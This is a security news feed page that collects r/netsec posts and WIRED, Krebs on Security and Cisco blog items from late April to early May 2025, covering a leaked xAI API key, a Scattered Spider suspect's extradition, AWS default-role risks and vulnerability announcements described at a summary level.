YARA Playground - Client Side WASM

By: /u/Diligent_Desk5592 — May 4th 2025 at 15:10

Hi all,

I often find myself needing to sanity-check a YARA rule against a test string or small binary, but spinning up the CLI or Docker feels heavy. So I built **YARA Playground** – a single-page web app that compiles `libyara` to WebAssembly and runs entirely client-side (no samples leave your browser).

• WASM YARA-X engine

• Shows pretty JSON, and tabular matches

• Supports 10 MiB binary upload, auto-persists last rule/sample

https://www.yaraplayground.com

Tech stack: Vite, TypeScript, CodeMirror, libyara-wasm (≈230 kB),

Would love feedback, feature requests or bug reports (especially edge-case rules).

I hope it's useful to someone, thanks!

submitted by /u/Diligent_Desk5592
[link] [comments]
☐ ☆ ✇ /r/netsec - Information Security News & Discussion

The Malware That Outsmarted Antivirus, Firewalls, and Humans — Meet Chimera

By: /u/badminton987 — May 4th 2025 at 00:09

This is an article about a fictitious business affected by malware that avoided detection from firewall and antivirus tools.

submitted by /u/badminton987
[link] [comments]
☐ ☆ ✇ WIRED

Hacking Spree Hits UK Retail Giants

Plus: France blames Russia for a series of cyberattacks, the US is taking steps to crack down on a gray market allegedly used by scammers, and Microsoft pushes the password one step closer to death.
☐ ☆ ✇ Security – Cisco Blog

Black Hat Asia 2025 NOC: Innovation in SOC

By: Jessica (Bair) Oppenheimer — April 24th 2025 at 12:00
Cisco is the Security Cloud Provider to the Black Hat conferences. Learn about the latest innovations for the SOC of the Future.
☐ ☆ ✇ WIRED

Mike Waltz Has Somehow Gotten Even Worse at Using Signal

By: Lily Hay Newman — May 2nd 2025 at 19:46
A photo taken this week showed Mike Waltz using an app that looks like—but is not—Signal to communicate with top officials. "I don't even know where to start with this," says one expert.
☐ ☆ ✇ /r/netsec - Information Security News & Discussion

AI hiveminds can exploit vulnerabilities 25% faster—here’s how they work

By: /u/raptorhunter22 — May 2nd 2025 at 09:08

I’ve been researching AI-driven cyber threats and wanted to share some findings on AI hiveminds—collaborative autonomous agents that could redefine offensive security. I wrote a post on this, but here’s the technical gist:

  • AI hiveminds are multi-agent systems where each agent handles a specific task (recon, exploitation, persistence) and coordinates via inter-agent communication. Think swarm intelligence applied to cyber attacks.
  • These agents use reinforcement learning (RL) to adapt in real-time. For example, an RL-trained agent can test exploits, learn from failures, and share insights with the hivemind, boosting efficiency. Research shows they can exploit vulnerabilities 25% faster than traditional methods, especially with minimal input (e.g., brief vuln descriptions).
  • Xanthorox AI, spotted on the darknet in 2025, automates malware generation and vuln exploitation. It’s a glimpse of what’s coming—fully autonomous hiveminds could orchestrate complex attack chains without human oversight.
  • They evade signature-based detection with polymorphic code and adversarial AI, while their speed (e.g., ransomware in hours) outpaces manual response. Defensive multi-agent systems are a potential counter, but observation spaces and reward functions are tricky to define.

You can read the full breakdown, including more on RL frameworks and future implications in the linked post.

What’s your take on this? Are we ready for AI-driven attacks at this scale? How would you approach defending against a hivemind exploiting vulns in real-time?

submitted by /u/raptorhunter22
[link] [comments]
☐ ☆ ✇ Krebs on Security

xAI Dev Leaks API Key for Private SpaceX, Tesla LLMs

By: BrianKrebs — May 2nd 2025 at 00:52

An employee at Elon Musk’s artificial intelligence company xAI leaked a private key on GitHub that for the past two months could have allowed anyone to query private xAI large language models (LLMs) which appear to have been custom made for working with internal data from Musk’s companies, including SpaceX, Tesla and Twitter/X, KrebsOnSecurity has learned.

Image: Shutterstock, @sdx15.

Philippe Caturegli, “chief hacking officer” at the security consultancy Seralys, was the first to publicize the leak of credentials for an x.ai application programming interface (API) exposed in the GitHub code repository of a technical staff member at xAI.

Caturegli’s post on LinkedIn caught the attention of researchers at GitGuardian, a company that specializes in detecting and remediating exposed secrets in public and proprietary environments. GitGuardian’s systems constantly scan GitHub and other code repositories for exposed API keys, and fire off automated alerts to affected users.

GitGuardian’s Eric Fourrier told KrebsOnSecurity the exposed API key had access to several unreleased models of Grok, the AI chatbot developed by xAI. In total, GitGuardian found the key had access to at least 60 fine-tuned and private LLMs.

“The credentials can be used to access the X.ai API with the identity of the user,” GitGuardian wrote in an email explaining their findings to xAI. “The associated account not only has access to public Grok models (grok-2-1212, etc) but also to what appears to be unreleased (grok-2.5V), development (research-grok-2p5v-1018), and private models (tweet-rejector, grok-spacex-2024-11-04).”

Fourrier found GitGuardian had alerted the xAI employee about the exposed API key nearly two months ago — on March 2. But as of April 30, when GitGuardian directly alerted xAI’s security team to the exposure, the key was still valid and usable. xAI told GitGuardian to report the matter through its bug bounty program at HackerOne, but just a few hours later the repository containing the API key was removed from GitHub.

“It looks like some of these internal LLMs were fine-tuned on SpaceX data, and some were fine-tuned with Tesla data,” Fourrier said. “I definitely don’t think a Grok model that’s fine-tuned on SpaceX data is intended to be exposed publicly.”

xAI did not respond to a request for comment. Nor did the 28-year-old xAI technical staff member whose key was exposed.

Carole Winqwist, chief marketing officer at GitGuardian, said giving potentially hostile users free access to private LLMs is a recipe for disaster.

“If you’re an attacker and you have direct access to the model and the back end interface for things like Grok, it’s definitely something you can use for further attacking,” she said. “An attacker could it use for prompt injection, to tweak the (LLM) model to serve their purposes, or try to implant code into the supply chain.”

The inadvertent exposure of internal LLMs for xAI comes as Musk’s so-called Department of Government Efficiency (DOGE) has been feeding sensitive government records into artificial intelligence tools. In February, The Washington Post reported DOGE officials were feeding data from across the Education Department into AI tools to probe the agency’s programs and spending.

The Post said DOGE plans to replicate this process across many departments and agencies, accessing the back-end software at different parts of the government and then using AI technology to extract and sift through information about spending on employees and programs.

“Feeding sensitive data into AI software puts it into the possession of a system’s operator, increasing the chances it will be leaked or swept up in cyberattacks,” Post reporters wrote.

Wired reported in March that DOGE has deployed a proprietary chatbot called GSAi to 1,500 federal workers at the General Services Administration, part of an effort to automate tasks previously done by humans as DOGE continues its purge of the federal workforce.

A Reuters report last month said Trump administration officials told some U.S. government employees that DOGE is using AI to surveil at least one federal agency’s communications for hostility to President Trump and his agenda. Reuters wrote that the DOGE team has heavily deployed Musk’s Grok AI chatbot as part of their work slashing the federal government, although Reuters said it could not establish exactly how Grok was being used.

Caturegli said while there is no indication that federal government or user data could be accessed through the exposed x.ai API key, these private models are likely trained on proprietary data and may unintentionally expose details related to internal development efforts at xAI, Twitter, or SpaceX.

“The fact that this key was publicly exposed for two months and granted access to internal models is concerning,” Caturegli said. “This kind of long-lived credential exposure highlights weak key management and insufficient internal monitoring, raising questions about safeguards around developer access and broader operational security.”

☐ ☆ ✇ WIRED

Think Twice Before Creating That ChatGPT Action Figure

By: Kate O'Flaherty — May 1st 2025 at 13:56
People are using ChatGPT’s new image generator to take part in viral social media trends. But using it also puts your privacy at risk—unless you take a few simple steps to protect yourself.
☐ ☆ ✇ Krebs on Security

Alleged ‘Scattered Spider’ Member Extradited to U.S.

By: BrianKrebs — April 30th 2025 at 21:54

A 23-year-old Scottish man thought to be a member of the prolific Scattered Spider cybercrime group was extradited last week from Spain to the United States, where he is facing charges of wire fraud, conspiracy and identity theft. U.S. prosecutors allege Tyler Robert Buchanan and co-conspirators hacked into dozens of companies in the United States and abroad, and that he personally controlled more than $26 million stolen from victims.

Scattered Spider is a loosely affiliated criminal hacking group whose members have broken into and stolen data from some of the world’s largest technology companies. Buchanan was arrested in Spain last year on a warrant from the FBI, which wanted him in connection with a series of SMS-based phishing attacks in the summer of 2022 that led to intrusions at Twilio, LastPass, DoorDash, Mailchimp, and many other tech firms.

Tyler Buchanan, being escorted by Spanish police at the airport in Palma de Mallorca in June 2024.

As first reported by KrebsOnSecurity, Buchanan (a.k.a. “tylerb”) fled the United Kingdom in February 2023, after a rival cybercrime gang hired thugs to invade his home, assault his mother, and threaten to burn him with a blowtorch unless he gave up the keys to his cryptocurrency wallet. Buchanan was arrested in June 2024 at the airport in Palma de Mallorca while trying to board a flight to Italy. His extradition to the United States was first reported last week by Bloomberg.

Members of Scattered Spider have been tied to the 2023 ransomware attacks against MGM and Caesars casinos in Las Vegas, but it remains unclear whether Buchanan was implicated in that incident. The Justice Department’s complaint against Buchanan makes no mention of the 2023 ransomware attack.

Rather, the investigation into Buchanan appears to center on the SMS phishing campaigns from 2022, and on SIM-swapping attacks that siphoned funds from individual cryptocurrency investors. In a SIM-swapping attack, crooks transfer the target’s phone number to a device they control and intercept any text messages or phone calls to the victim’s device — including one-time passcodes for authentication and password reset links sent via SMS.

In August 2022, KrebsOnSecurity reviewed data harvested in a months-long cybercrime campaign by Scattered Spider involving countless SMS-based phishing attacks against employees at major corporations. The security firm Group-IB called them by a different name — 0ktapus, because the group typically spoofed the identity provider Okta in their phishing messages to employees at targeted firms.

A Scattered Spider/0Ktapus SMS phishing lure sent to Twilio employees in 2022.

The complaint against Buchanan (PDF) says the FBI tied him to the 2022 SMS phishing attacks after discovering the same username and email address was used to register numerous Okta-themed phishing domains seen in the campaign. The domain registrar NameCheap found that less than a month before the phishing spree, the account that registered those domains logged in from an Internet address in the U.K. FBI investigators said the Scottish police told them the address was leased to Buchanan from January 26, 2022 to November 7, 2022.

Authorities seized at least 20 digital devices when they raided Buchanan’s residence, and on one of those devices they found usernames and passwords for employees of three different companies targeted in the phishing campaign.

“The FBI’s investigation to date has gathered evidence showing that Buchanan and his co-conspirators targeted at least 45 companies in the United States and abroad, including Canada, India, and the United Kingdom,” the FBI complaint reads. “One of Buchanan’s devices contained a screenshot of Telegram messages between an account known to be used by Buchanan and other unidentified co-conspirators discussing dividing up the proceeds of SIM swapping.”

U.S. prosecutors allege that records obtained from Discord showed the same U.K. Internet address was used to operate a Discord account that specified a cryptocurrency wallet when asking another user to send funds. The complaint says the publicly available transaction history for that payment address shows approximately 391 bitcoin was transferred in and out of this address between October 2022 and
February 2023; 391 bitcoin is presently worth more than $26 million.

In November 2024, federal prosecutors in Los Angeles unsealed criminal charges against Buchanan and four other alleged Scattered Spider members, including Ahmed Elbadawy, 23, of College Station, Texas; Joel Evans, 25, of Jacksonville, North Carolina; Evans Osiebo, 20, of Dallas; and Noah Urban, 20, of Palm Coast, Florida. KrebsOnSecurity reported last year that another suspected Scattered Spider member — a 17-year-old from the United Kingdom — was arrested as part of a joint investigation with the FBI into the MGM hack.

Mr. Buchanan’s court-appointed attorney did not respond to a request for comment. The accused faces charges of wire fraud conspiracy, conspiracy to obtain information by computer for private financial gain, and aggravated identity theft. Convictions on the latter charge carry a minimum sentence of two years in prison.

Documents from the U.S. District Court for the Central District of California indicate Buchanan is being held without bail pending trial. A preliminary hearing in the case is slated for May 6.

☐ ☆ ✇ WIRED

North Korea Stole Your Job

By: Bobbie Johnson — May 1st 2025 at 07:00
For years, North Korea has been secretly placing young IT workers inside Western companies. With AI, their schemes are now more devious—and effective—than ever.
☐ ☆ ✇ WIRED

AI Code Hallucinations Increase the Risk of ‘Package Confusion’ Attacks

By: Dan Goodin, Ars Technica — April 30th 2025 at 19:08
A new study found that code generated by AI is more likely to contain made-up information that can be used to trick software into interacting with malicious code.
☐ ☆ ✇ /r/netsec - Information Security News & Discussion

AiTM for WHFB persistence

By: /u/rikvduijn — April 30th 2025 at 17:09

We recently ran an internal EntraIDiots CTF where players had to phish a user, register a device, grab a PRT, and use that to enroll Windows Hello for Business—because the only way to access the flag site was via phishing-resistant MFA.

The catch? To make WHFB registration work, the victim must have performed MFA in the last 10 minutes.In our CTF, we solved this by forcing MFA during device code flow authentication. But that’s not something you can do in a real-life red team scenario.

So we asked ourselves: how can we force a user we do not controlll to always perform MFA? That’s exactly what this blog explores.

submitted by /u/rikvduijn
[link] [comments]
☐ ☆ ✇ /r/netsec - Information Security News & Discussion

Samsung MagicINFO Unauthenticated RCE

By: /u/Straight-Zombie-646 — April 30th 2025 at 09:23

MagicINFO exposes an endpoint with several flaws that, when combined, allow an unauthenticated attacker to upload a JSP file and execute arbitrary server-side code.

submitted by /u/Straight-Zombie-646
[link] [comments]
☐ ☆ ✇ WIRED

WhatsApp Is Walking a Tightrope Between AI Features and Privacy

By: Lily Hay Newman — April 29th 2025 at 17:15
WhatsApp's AI tools will use a new “Private Processing” system designed to allow cloud access without letting Meta or anyone else see end-to-end encrypted chats. But experts still see risks.
☐ ☆ ✇ /r/netsec - Information Security News & Discussion

Shadow Roles: AWS Defaults Can Open the Door to Service Takeover

By: /u/Pale_Fly_2673 — April 29th 2025 at 16:27

TL;DR: We discovered that AWS services like SageMaker, Glue, and EMR generate default IAM roles with overly broad permissions—including full access to all S3 buckets. These default roles can be exploited to escalate privileges, pivot between services, and even take over entire AWS accounts. For example, importing a malicious Hugging Face model into SageMaker can trigger code execution that compromises other AWS services. Similarly, a user with access only to the Glue service could escalate privileges and gain full administrative control. AWS has made fixes and notified users, but many environments remain exposed because these roles still exist—and many open-source projects continue to create similarly risky default roles.

submitted by /u/Pale_Fly_2673
[link] [comments]
☐ ☆ ✇ WIRED

Millions of Apple Airplay-Enabled Devices Can Be Hacked via Wi-Fi

By: Lily Hay Newman, Andy Greenberg — April 29th 2025 at 12:30
Researchers reveal a collection of bugs known as AirBorne that would allow any hacker on the same Wi-Fi network as a third-party AirPlay-enabled device to surreptitiously run their own code on it.
☐ ☆ ✇ Security – Cisco Blog

Instant Attack Verification: Verification to Trust Automated Response

By: Briana Farro — April 29th 2025 at 12:00
Discover how Cisco XDR’s Instant Attack Verification brings real-time threat validation for faster, smarter SOC response.
☐ ☆ ✇ /r/netsec - Information Security News & Discussion

Using an LLM with MCP for Threat Hunting

By: /u/eitot8 — April 29th 2025 at 02:21

As a small MCP research project, I’ve built a MCP server to interact with Elasticsearch where Sysmon logs are shipped. This allows LLM to perform log analysis to identify potential threats and malicious activities 🤖

submitted by /u/eitot8
[link] [comments]
☐ ☆ ✇ Security – Cisco Blog

Foundation-sec-8b: Cisco Foundation AI’s First Open-Source Security Model

By: Yaron Singer — April 28th 2025 at 11:55
Foundation AI's first release — Llama-3.1-FoundationAI-SecurityLLM-base-8B — is designed to improve response time, expand capacity, and proactively reduce risk.
❌